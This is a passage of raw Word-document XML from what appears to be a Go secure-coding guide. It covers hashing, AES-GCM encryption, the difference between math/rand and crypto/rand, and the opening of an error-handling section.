          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve">)
        io.WriteString(h_blake2s, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text13"/>
        </w:rPr>
        <w:t xml:space="preserve">"Welcome to Go Language Secure Coding Practices"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve">)
        fmt.Printf(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text13"/>
        </w:rPr>
        <w:t xml:space="preserve">"MD5        : %x\n"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve">, h_md5.Sum(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text12"/>
        </w:rPr>
        <w:t xml:space="preserve">nil</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve">))
        fmt.Printf(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text13"/>
        </w:rPr>
        <w:t xml:space="preserve">"SHA256     : %x\n"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve">, h_sha.Sum(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text12"/>
        </w:rPr>
        <w:t xml:space="preserve">nil</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve">))
        fmt.Printf(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text13"/>
        </w:rPr>
        <w:t xml:space="preserve">"Blake2s-256: %x\n"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve">, h_blake2s.Sum(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text12"/>
        </w:rPr>
        <w:t xml:space="preserve">nil</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve">))
}
</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r>
        <w:t>The output</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Para 04"/>
        <w:keepLines w:val="on"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">MD5        : ea9321d8fb0ec6623319e49a634aad92
SHA256     : ba4939528707d791242d1af175e580c584dc0681af8be2a4604a526e864449f6
Blake2s-256: 1d65fa02df8a149c245e5854d980b38855fd2c78f2924ace9b64e8b21b3f2f82
</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r>
        <w:t>Note</w:t>
        <w:t xml:space="preserve">: To run the source code sample you'll need to run </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text2"/>
        </w:rPr>
        <w:t>$ go get golang.org/x/crypto/blake2s</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r>
        <w:t>On the other hand, encryption turns data into variable length data using a key</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Para 04"/>
        <w:keepLines w:val="on"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">encrypted_data := F(data, key)
</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Unlike the hash, we can compute </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text2"/>
        </w:rPr>
        <w:t>data</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> back from </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text2"/>
        </w:rPr>
        <w:t>encrypted_data</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> by applying the right decryption function and key:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Para 04"/>
        <w:keepLines w:val="on"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">data := F⁻¹(encrypted_data, key)
</w:t>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0"/>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36"/>
        </w:numPr>
        <w:pStyle w:val="Para 01"/>
      </w:pPr>
      <w:r>
        <w:t>Sending authenticated, encrypted messages between two parties using public key cryptography (nacl/box)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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"crypto/aes"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve">
</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">import</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text13"/>
        </w:rPr>
        <w:t xml:space="preserve">"crypto/cipher"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve">
</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">import</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text13"/>
        </w:rPr>
        <w:t xml:space="preserve">"crypto/rand"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve">
</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">func</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve"> main() {
        key := []</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">byte</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve">(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text13"/>
        </w:rPr>
        <w:t xml:space="preserve">"Encryption Key should be 32 char"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve">)
        data := []</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">byte</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve">(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text13"/>
        </w:rPr>
        <w:t xml:space="preserve">"Welcome to Go Language Secure Coding Practices"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve">)
        block, err := aes.NewCipher(key)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nonce := </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text12"/>
        </w:rPr>
        <w:t xml:space="preserve">make</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve">([]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">byte</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text12"/>
        </w:rPr>
        <w:t xml:space="preserve">12</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve">)
        </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">if</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve"> _, err := rand.Read(nonce); err != </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text12"/>
        </w:rPr>
        <w:t xml:space="preserve">nil</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve"> {
                </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text12"/>
        </w:rPr>
        <w:t xml:space="preserve">panic</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve">(err.Error())
        }
        aesgcm, err := cipher.NewGCM(block)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encrypted_data := aesgcm.Seal(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text12"/>
        </w:rPr>
        <w:t xml:space="preserve">nil</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve">, nonce, data, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text12"/>
        </w:rPr>
        <w:t xml:space="preserve">nil</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve">)
        fmt.Printf(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text13"/>
        </w:rPr>
        <w:t xml:space="preserve">"Encrypted: %x\n"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve">, encrypted_data)
        decrypted_data, err := aesgcm.Open(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text12"/>
        </w:rPr>
        <w:t xml:space="preserve">nil</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve">, nonce, encrypted_data, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text12"/>
        </w:rPr>
        <w:t xml:space="preserve">nil</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve">)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(err.Error())
        }
        fmt.Printf(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text13"/>
        </w:rPr>
        <w:t xml:space="preserve">"Decrypted: %s\n"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve">, decrypted_data)
}
</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Para 04"/>
        <w:keepLines w:val="on"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Encrypted: a66bd44db1fac7281c33f6ca40494a320644584d0595e5a0e9a202f8aeb22dae659dc06932d4e409fe35a95d14b1cffacbe3914460dd27cbd274b0c3a561
Decrypted: Welcome to Go Language Secure Coding Practices
</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r>
        <w:t>Please note, you should "</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text0"/>
        </w:rPr>
        <w:t>establish and utilize a policy and process for how cryptographic keys will be managed</w:t>
      </w:r>
      <w:r>
        <w:t>", protecting "</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text0"/>
        </w:rPr>
        <w:t>master secrets from unauthorized access</w:t>
      </w:r>
      <w:r>
        <w:t>". That being said, your cryptographic keys shouldn't be hardcoded in the source code (as it is in this example).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:hyperlink r:id="rId77" w:tooltip="">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Text1"/>
          </w:rPr>
          <w:t>Go's crypto package</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> collects common cryptographic constants, but implementations have their own packages, like the </w:t>
      </w:r>
      <w:hyperlink r:id="rId78" w:tooltip="">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Text1"/>
          </w:rPr>
          <w:t>crypto/md5</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> one.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Most modern cryptographic algorithms have been implemented under </w:t>
      </w:r>
      <w:hyperlink r:id="rId79" w:tooltip="">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Text1"/>
          </w:rPr>
          <w:t>https://godoc.org/golang.org/x/crypto</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve">, so developers should focus on those instead of the implementations in the </w:t>
      </w:r>
      <w:hyperlink r:id="rId77" w:tooltip="">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Text6"/>
          </w:rPr>
          <w:t>crypto/*</w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink r:id="rId77" w:tooltip="">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Text1"/>
          </w:rPr>
          <w:t xml:space="preserve"> package</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="0 Block"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:bookmarkStart w:id="47" w:name="1__Rainbow_table_attacks_are_not_a_weakness_on_th___"/>
      <w:pPr>
        <w:pStyle w:val="Para 19"/>
        <w:keepLines w:val="on"/>
      </w:pPr>
      <w:r>
        <w:t/>
        <w:t>1</w:t>
        <w:t>. Rainbow table attacks are not a weakness on the hashing algorithms.</w:t>
      </w:r>
      <w:hyperlink w:anchor="1" w:tooltip="Jump back to footnote [1] in the text.">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Text1"/>
          </w:rPr>
          <w:t xml:space="preserve"> ↩</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:bookmarkEnd w:id="47"/>
    </w:p>
    <w:p>
      <w:bookmarkStart w:id="48" w:name="2__Consider_reading_the_Authentication_and_Passwo___"/>
      <w:pPr>
        <w:pStyle w:val="Para 18"/>
        <w:keepLines w:val="on"/>
      </w:pPr>
      <w:r>
        <w:t/>
        <w:t>2</w:t>
        <w:t xml:space="preserve">. Consider reading the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text1"/>
        </w:rPr>
        <w:t>Authentication and Password Management</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> section about "</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text0"/>
        </w:rPr>
        <w:t>strong one-way salted hashes</w:t>
      </w:r>
      <w:r>
        <w:t>" for credentials.</w:t>
      </w:r>
      <w:hyperlink w:anchor="2" w:tooltip="Jump back to footnote [2] in the text.">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Text1"/>
          </w:rPr>
          <w:t xml:space="preserve"> ↩</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:bookmarkEnd w:id="48"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Para 23"/>
        <w:pageBreakBefore w:val="on"/>
      </w:pPr>
      <w:r>
        <w:t/>
      </w:r>
    </w:p>
    <w:p>
      <w:bookmarkStart w:id="49" w:name="Pseudo_Random_Generators"/>
      <w:pPr>
        <w:keepNext/>
        <w:pStyle w:val="Heading 1"/>
      </w:pPr>
      <w:r>
        <w:t>Pseudo-Random Generators</w:t>
      </w:r>
      <w:bookmarkEnd w:id="49"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Para 11"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text0"/>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0"/>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0" w:tooltip="">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Text1"/>
          </w:rPr>
          <w:t>Go's math/rand</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> is not an exception.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Para 11"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text0"/>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0"/>
        </w:rPr>
        <w:t>" (</w:t>
      </w:r>
      <w:hyperlink r:id="rId81" w:tooltip="">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Text4"/>
          </w:rPr>
          <w:t>source</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text0"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r>
        <w:t>What exactly does that mean? Let's see:</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"math/rand"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve">
</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">func</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve"> main() {
    fmt.Println(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text13"/>
        </w:rPr>
        <w:t xml:space="preserve">"Random Number: "</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve">, rand.Intn(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text12"/>
        </w:rPr>
        <w:t xml:space="preserve">1984</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve">))
}
</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r>
        <w:t>Running this program several times will lead exactly to the same number/sequence, but why?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Para 07"/>
        <w:keepLines w:val="on"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text10"/>
        </w:rPr>
        <w:t xml:space="preserve">$ </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">for</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve"> i </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">in</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve"> {1..5}; </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">do</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve"> go run rand.go; </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">done</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve">
Random Number:  1825
Random Number:  1825
Random Number:  1825
Random Number:  1825
Random Number:  1825
</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Because </w:t>
      </w:r>
      <w:hyperlink r:id="rId80" w:tooltip="">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Text1"/>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2" w:tooltip="">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Text1"/>
          </w:rPr>
          <w:t>math/rand Seed function</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve">, getting the expected five different values for each program execution. But because we're on Cryptographic Practices section, we should follow to </w:t>
      </w:r>
      <w:hyperlink r:id="rId83" w:tooltip="">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Text1"/>
          </w:rPr>
          <w:t>Go's crypto/rand package</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Para 07"/>
        <w:keepLines w:val="on"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">package</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve"> main
</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">import</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text13"/>
        </w:rPr>
        <w:t xml:space="preserve">"fmt"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve">
</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">import</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text13"/>
        </w:rPr>
        <w:t xml:space="preserve">"math/big"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve">
</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">import</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text13"/>
        </w:rPr>
        <w:t xml:space="preserve">"crypto/rand"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve">
</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">func</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve"> main() {
    rand, err := rand.Int(rand.Reader, big.NewInt(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text12"/>
        </w:rPr>
        <w:t xml:space="preserve">1984</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve">))
    </w:t>
      </w:r>
      <w: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fmt.Printf(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text13"/>
        </w:rPr>
        <w:t xml:space="preserve">"Random Number: %d\n"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve">, rand)
}
</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">You may notice that running </w:t>
      </w:r>
      <w:hyperlink r:id="rId83" w:tooltip="">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Text1"/>
          </w:rPr>
          <w:t>crypto/rand</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> is slower than </w:t>
      </w:r>
      <w:hyperlink r:id="rId80" w:tooltip="">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Text1"/>
          </w:rPr>
          <w:t>math/rand</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve">, but this is expected since the fastest algorithm isn't always the safest. Crypto's rand is also safer to implement. An example of this is the fact that you </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text0"/>
        </w:rPr>
        <w:t>CANNOT</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> seed crypto/rand, since the library uses OS-randomness for this, preventing developer misuse.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Para 07"/>
        <w:keepLines w:val="on"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text10"/>
        </w:rPr>
        <w:t xml:space="preserve">$ </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">for</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve"> i </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">in</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve"> {1..5}; </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">do</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve"> go run rand-safe.go; </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">done</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve">
Random Number: 277
Random Number: 1572
Random Number: 1793
Random Number: 1328
Random Number: 1378
</w:t>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0" w:tooltip="">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Text1"/>
          </w:rPr>
          <w:t>Go's math/rand</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t>, as shown in the first example.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r>
        <w:t>Yes, you guessed it, you would be able to predict the user's password!</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Para 23"/>
        <w:pageBreakBefore w:val="on"/>
      </w:pPr>
      <w:r>
        <w:t/>
      </w:r>
    </w:p>
    <w:p>
      <w:bookmarkStart w:id="50" w:name="Error_Handling_and_Logging"/>
      <w:pPr>
        <w:keepNext/>
        <w:pStyle w:val="Heading 1"/>
      </w:pPr>
      <w:r>
        <w:t>Error Handling and Logging</w:t>
      </w:r>
      <w:bookmarkEnd w:id="50"/>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2"/>
        </w:numPr>
        <w:pStyle w:val="Para 01"/>
      </w:pPr>
      <w:r>
        <w:t>Error Handling</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:pStyle w:val="Para 01"/>
      </w:pPr>
      <w:r>
        <w:t>Logging</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Para 23"/>
        <w:pageBreakBefore w:val="on"/>
      </w:pPr>
      <w:r>
        <w:t/>
      </w:r>
    </w:p>
    <w:p>
      <w:bookmarkStart w:id="51" w:name="Error_Handling"/>
      <w:pPr>
        <w:keepNext/>
        <w:pStyle w:val="Heading 1"/>
      </w:pPr>
      <w:r>
        <w:t>Error Handling</w:t>
      </w:r>
      <w:bookmarkEnd w:id="51"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">In Go, there is a built-in </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text2"/>
        </w:rPr>
        <w:t>error</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> type. The different values of </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text2"/>
        </w:rPr>
        <w:t>error</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> type indicate an abnormal state. Usually in Go, if the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text2"/>
        </w:rPr>
        <w:t>error</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> value is not </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text2"/>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05"/>
        <w:keepLines w:val="on"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text14"/>
        </w:rPr>
        <w:t xml:space="preserve">if</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve"> err != </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text12"/>
        </w:rPr>
        <w:t xml:space="preserve">nil</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve"> {
    </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">// handle the error</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
